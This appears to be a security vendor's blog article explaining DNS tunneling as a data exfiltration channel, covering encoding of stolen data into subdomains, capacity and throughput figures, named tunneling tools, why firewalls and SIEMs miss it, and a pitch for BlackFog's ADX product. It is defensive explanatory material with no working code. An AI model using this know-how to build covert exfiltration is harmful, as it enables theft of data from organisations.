Why DNS Is the Perfect Exfiltration Channel
Every networked device makes DNS queries. Every firewall allows DNS traffic (UDP port 53, TCP port 53, and increasingly DoH on port 443). If you block DNS, the internet stops working. Attackers have known this for over a decade. DNS tunneling encodes arbitrary data inside DNS queries and responses. Instead of resolving "google.com", a compromised device queries "dGhpcyBpcyBzdG9sZW4gZGF0YQ.attacker-domain.com" — where the subdomain is actually base64-encoded stolen data. The attacker's authoritative DNS server receives the query, decodes the data, and responds with the next instruction. Palo Alto Networks' Unit 42 found that DNS tunneling is used in approximately 46% of malware that employs data exfiltration, making it the single most common exfiltration technique after direct HTTPS connections.
The Technical Mechanics
A DNS tunneling attack requires three components: a compromised endpoint, a piece of tunneling software (or malware with tunneling capability), and an attacker-controlled domain with a custom authoritative nameserver. The endpoint encodes data — documents, credentials, database exports — into DNS-compliant strings, typically using base64 or hex encoding. Each DNS query can carry approximately 253 bytes in the subdomain field. Responses (TXT records) can carry up to 65,535 bytes. At a sustained rate of 50 queries per second, an attacker can exfiltrate approximately 1MB per minute through DNS alone. Tools like iodine, dnscat2, and Cobalt Strike's DNS beacon make this trivial to deploy. The entire exfiltration appears as normal DNS resolution traffic to traditional security tools.
- DNS queries can carry ~253 bytes per subdomain label
- TXT responses can carry up to 65,535 bytes
- At 50 queries/second, approximately 1MB/minute exfiltration rate
- Tools: iodine, dnscat2, Cobalt Strike DNS beacon
- Traffic appears as normal DNS resolution to most security tools
Why Your Firewall and SIEM Miss It
Traditional firewalls inspect DNS at the protocol level — they verify that a packet is a valid DNS query, but they do not analyse the content of the query for encoded data. Next-generation firewalls with DNS inspection capabilities exist, but they typically rely on reputation-based blocking of known malicious domains, which fails against freshly registered attacker-controlled domains. SIEM systems can theoretically detect DNS tunneling through anomaly detection — unusual query volumes, high entropy in subdomain strings, abnormal TXT record sizes — but in practice, the signal-to-noise ratio makes this unreliable. A 2023 SANS Institute study found that organisations using SIEM-based DNS monitoring had a 23% false positive rate, leading most SOC teams to reduce alert sensitivity or ignore DNS anomaly alerts entirely.
How ADX Catches What Others Miss
Anti data exfiltration technology takes a fundamentally different approach to DNS tunneling. Rather than trying to distinguish malicious DNS queries from legitimate ones after the fact, ADX monitors all outbound data flows — including DNS — in real time at the endpoint. BlackFog's engine analyses the destination, content patterns, volume, and behaviour of every outbound connection. When a device begins making DNS queries with high-entropy subdomain strings to a recently registered domain at an elevated frequency, ADX blocks the traffic before the first byte of stolen data reaches the attacker's server. This works regardless of the encoding scheme, tunneling tool, or domain reputation because ADX is analysing the behaviour of the data flow, not just the protocol compliance of the packet.